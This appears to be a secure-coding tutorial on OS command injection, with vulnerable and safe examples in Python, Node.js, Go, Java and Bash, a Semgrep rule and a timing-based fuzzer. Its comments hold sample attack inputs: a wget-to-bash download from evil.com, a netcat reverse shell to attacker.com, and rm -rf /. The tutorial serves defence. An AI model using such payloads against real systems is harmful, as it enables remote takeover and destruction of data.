Command Injection: OS Command Sanitization

Command injection occurs when an attacker can execute arbitrary operating system commands on your server through a vulnerable application. It's not a subtle vulnerability—it's a complete system...

Key Insights

  • Command injection remains one of the most severe vulnerabilities because it grants attackers direct access to your operating system—avoid shell invocation entirely by using parameterized execution APIs
  • Blocklist-based sanitization always fails eventually; use strict allowlisting when you must accept user input that touches system commands
  • The difference between exec() and spawn() (or their equivalents) isn’t just stylistic—it’s the difference between a secure application and a compromised server

Introduction to Command Injection

Command injection occurs when an attacker can execute arbitrary operating system commands on your server through a vulnerable application. It’s not a subtle vulnerability—it’s a complete system compromise waiting to happen.

This attack class has earned its permanent spot in the OWASP Top 10 for good reason. The 2014 Shellshock vulnerability affected millions of servers worldwide, allowing attackers to execute commands through malformed environment variables in Bash. More recently, command injection flaws in popular packages like ua-parser-js and various CI/CD tools have demonstrated that even experienced developers get this wrong.

The stakes are straightforward: command injection means an attacker can read your database credentials, install backdoors, pivot to other systems, or simply run rm -rf / and watch your infrastructure disappear. There’s no partial compromise here.

How Command Injection Works

Command injection exploits the gap between “data” and “code” when your application constructs shell commands using untrusted input. When you concatenate user input into a string that gets passed to a shell interpreter, you’re trusting that input to be benign data. Attackers exploit this trust.

Shell interpreters recognize special characters that change command flow:

  • ; terminates a command and starts a new one
  • | pipes output to another command
  • && and || chain commands conditionally
  • $() and backticks execute subcommands
  • > and >> redirect output to files
  • Newlines can separate commands

Here’s a vulnerable Python example:

import os

def ping_host(hostname):
    # VULNERABLE: User input directly interpolated into shell command
    os.system(f"ping -c 4 {hostname}")

# Attacker input: "google.com; cat /etc/passwd"
# Executed command: ping -c 4 google.com; cat /etc/passwd

The Node.js equivalent is equally dangerous:

const { exec } = require('child_process');

function convertImage(filename) {
    // VULNERABLE: User-controlled filename in shell command
    exec(`convert ${filename} output.png`, (error, stdout, stderr) => {
        if (error) console.error(error);
    });
}

// Attacker input: "image.jpg; rm -rf /"
// Executed command: convert image.jpg; rm -rf / output.png

The shell doesn’t know that filename was supposed to be just a filename. It interprets the entire string, special characters and all.

Common Vulnerable Patterns

Certain code patterns consistently produce command injection vulnerabilities. Learning to recognize them saves you from introducing these flaws.

Image processing pipelines frequently shell out to tools like ImageMagick:

import os

def resize_image(user_filename, width, height):
    # VULNERABLE: Multiple user inputs in command
    os.system(f"convert {user_filename} -resize {width}x{height} output.jpg")

# Attacker can inject via filename OR dimensions
# filename: "input.jpg -write /tmp/pwned.php input.jpg"
# This exploits ImageMagick's own argument parsing

Network diagnostic tools are common targets:

import subprocess

def check_host(ip_address):
    # VULNERABLE: Even subprocess with shell=True is dangerous
    result = subprocess.run(
        f"ping -c 1 {ip_address}",
        shell=True,
        capture_output=True
    )
    return result.stdout

# Attacker input: "127.0.0.1; wget http://evil.com/backdoor.sh | bash"

File operations with user-controlled paths often hide injection vectors:

const { exec } = require('child_process');

function compressUpload(uploadedFilename) {
    // VULNERABLE: Filename from user upload
    exec(`gzip -k uploads/${uploadedFilename}`, (err) => {
        if (err) console.error('Compression failed');
    });
}

// Attacker uploads file named: "file.txt; nc -e /bin/sh attacker.com 4444"

Environment variable injection is often overlooked:

#!/bin/bash
# VULNERABLE: Environment variable used unsafely
LOG_DIR="${USER_LOG_PATH:-/var/log}"
tar -czf backup.tar.gz $LOG_DIR
# If USER_LOG_PATH contains "; malicious_command", it executes

Defense Strategy 1: Avoid the Shell Entirely

The most effective defense is never invoking a shell interpreter. Most languages provide APIs that execute programs directly, passing arguments as separate array elements rather than a parsed string.

Python’s subprocess with argument lists:

import subprocess

def ping_host_safe(hostname):
    # SAFE: Arguments passed as list, no shell interpretation
    result = subprocess.run(
        ["ping", "-c", "4", hostname],
        capture_output=True,
        text=True
    )
    return result.stdout

# Even if hostname is "google.com; rm -rf /", it's treated as a literal
# string argument to ping, which will simply fail to resolve

Node.js spawn vs exec:

const { spawn } = require('child_process');

function convertImageSafe(filename) {
    // SAFE: spawn() doesn't invoke a shell by default
    const process = spawn('convert', [filename, 'output.png']);
    
    process.on('close', (code) => {
        console.log(`Process exited with code ${code}`);
    });
}

// The filename "image.jpg; rm -rf /" becomes a single argument
// convert receives it literally and fails gracefully

Go’s exec.Command:

package main

import (
    "os/exec"
)

func pingHost(hostname string) ([]byte, error) {
    // SAFE: Arguments are separate, no shell parsing
    cmd := exec.Command("ping", "-c", "4", hostname)
    return cmd.Output()
}

// Malicious input like "google.com; cat /etc/passwd" 
// is passed as a single argument to ping

Java’s ProcessBuilder:

import java.io.*;
import java.util.*;

public class SafeCommand {
    public static String pingHost(String hostname) throws IOException {
        // SAFE: Arguments in list form
        ProcessBuilder pb = new ProcessBuilder("ping", "-c", "4", hostname);
        Process process = pb.start();
        
        BufferedReader reader = new BufferedReader(
            new InputStreamReader(process.getInputStream())
        );
        StringBuilder output = new StringBuilder();
        String line;
        while ((line = reader.readLine()) != null) {
            output.append(line).append("\n");
        }
        return output.toString();
    }
}

The key principle: when arguments are array elements rather than parts of a parsed string, shell metacharacters lose their special meaning.

Defense Strategy 2: Input Validation and Sanitization

Sometimes you genuinely need shell features—pipes, redirects, or complex command chains. When shell invocation is unavoidable, implement strict input validation.

Allowlisting beats blocklisting every time:

import re
import subprocess

ALLOWED_HOSTS = {"google.com", "github.com", "internal.company.com"}

def ping_allowed_host(hostname):
    # Strict allowlist validation
    if hostname not in ALLOWED_HOSTS:
        raise ValueError(f"Host {hostname} not in allowed list")
    
    return subprocess.run(
        ["ping", "-c", "4", hostname],
        capture_output=True,
        text=True
    ).stdout

def ping_validated_ip(ip_address):
    # Pattern validation for IP addresses
    ip_pattern = re.compile(r'^(\d{1,3}\.){3}\d{1,3}$')
    if not ip_pattern.match(ip_address):
        raise ValueError("Invalid IP address format")
    
    # Additional check: validate each octet
    octets = ip_address.split('.')
    if not all(0 <= int(octet) <= 255 for octet in octets):
        raise ValueError("IP address octets out of range")
    
    return subprocess.run(
        ["ping", "-c", "4", ip_address],
        capture_output=True,
        text=True
    ).stdout

When you must use shell, escape properly:

import shlex
import subprocess

def search_logs_shell(search_term):
    # shlex.quote() escapes shell metacharacters
    safe_term = shlex.quote(search_term)
    
    # Still not ideal, but safer when shell=True is required
    result = subprocess.run(
        f"grep {safe_term} /var/log/app.log | head -100",
        shell=True,
        capture_output=True,
        text=True
    )
    return result.stdout

Bash script sanitization:

#!/bin/bash

sanitize_filename() {
    local input="$1"
    # Remove any character that isn't alphanumeric, dash, underscore, or dot
    echo "$input" | tr -cd 'a-zA-Z0-9._-'
}

process_file() {
    local raw_filename="$1"
    local safe_filename
    safe_filename=$(sanitize_filename "$raw_filename")
    
    # Verify the sanitized name isn't empty
    if [[ -z "$safe_filename" ]]; then
        echo "Invalid filename" >&2
        return 1
    fi
    
    # Use quotes and -- to prevent option injection
    cat -- "$safe_filename"
}

Testing and Detection

Identifying command injection requires multiple approaches: static analysis, code review, and active testing.

Semgrep rule for detecting vulnerable patterns:

rules:
  - id: python-command-injection
    patterns:
      - pattern-either:
          - pattern: os.system($CMD)
          - pattern: subprocess.run($CMD, shell=True, ...)
          - pattern: subprocess.call($CMD, shell=True, ...)
          - pattern: subprocess.Popen($CMD, shell=True, ...)
    message: "Potential command injection - avoid shell=True and os.system()"
    languages: [python]
    severity: ERROR

  - id: node-command-injection
    patterns:
      - pattern-either:
          - pattern: exec($CMD, ...)
          - pattern: execSync($CMD, ...)
    message: "Potential command injection - use spawn() instead of exec()"
    languages: [javascript, typescript]
    severity: ERROR

Simple fuzzing script for testing endpoints:

#!/usr/bin/env python3
import requests
import time

INJECTION_PAYLOADS = [
    "; sleep 5",
    "| sleep 5",
    "&& sleep 5",
    "|| sleep 5",
    "`sleep 5`",
    "$(sleep 5)",
    "\n sleep 5",
    "'; sleep 5; '",
]

def test_endpoint(url, param_name):
    for payload in INJECTION_PAYLOADS:
        start = time.time()
        try:
            response = requests.get(
                url,
                params={param_name: f"test{payload}"},
                timeout=10
            )
            elapsed = time.time() - start
            
            if elapsed > 4:  # Sleep-based detection
                print(f"[VULNERABLE] Payload '{payload}' caused {elapsed:.1f}s delay")
        except requests.Timeout:
            print(f"[VULNERABLE] Payload '{payload}' caused timeout")

# Usage: test_endpoint("http://localhost:8080/ping", "host")

Summary and Security Checklist

Command injection is preventable. Follow these principles during development and code review:

Pre-deployment checklist:

  1. Audit all shell invocations — Search your codebase for os.system, exec(), shell=True, and similar patterns
  2. Replace shell calls with parameterized APIs — Use subprocess.run() with argument lists, spawn() instead of exec(), or equivalent safe APIs
  3. Validate inputs against strict allowlists — If you must accept user input for commands, define exactly what’s permitted
  4. Escape when unavoidable — Use shlex.quote() or equivalent when shell invocation is truly necessary
  5. Run static analysis — Integrate Semgrep, CodeQL, or Bandit into your CI pipeline
  6. Test with injection payloads — Include command injection tests in your security testing suite
  7. Apply least privilege — Run application processes with minimal OS permissions to limit blast radius

The safest shell command is the one you never execute. Design your systems to avoid shelling out whenever possible, and treat every case where you do as a potential vulnerability requiring careful review.

Additional resources:

Liked this? There's more.

Every week: one practical technique, explained simply, with code you can use immediately.